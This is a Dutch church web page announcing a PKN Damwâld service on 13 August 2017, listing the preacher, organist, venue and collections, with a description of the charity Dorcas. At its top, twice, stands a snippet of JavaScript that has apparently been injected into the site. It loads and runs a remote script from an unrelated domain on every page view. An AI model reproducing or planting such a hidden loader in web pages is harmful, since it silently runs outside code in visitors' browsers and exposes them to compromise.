;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 13 augustus 2017 14:00 uur - PKN Damwâld
zondag 13 augustus 2017
14:00 uur

Kerkdienst zondag 13 augustus 2017 14:00 uur

Informatie

Voorganger:Dhr. T.R.A. Simonides, Birdaard
Organist:Jelte Cuperus
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Dorcas

Dorcas is een Internationale Christelijke organisatie voor ontwikkelingssamenwerking, sociale hulp, noodhulp en wederopbouw. Dorcas zet zich in om de opdracht van Jezus Christus te vervullen: zorgen voor de armen en verdrukten (Mattheüs 25: 31-46). Zij doen dit door hen in staat te stellen hun positie in de samenleving te versterken en hun zelfredzaamheid te vergroten en door het bieden van sociale zorg en het verlenen van hulp in noodsituaties. Zij steunen de allerarmsten ongeacht hun ras, religie, geslacht of politieke overtuiging.

Tweede collecte: Kerk
Uitganscollecte: Kerk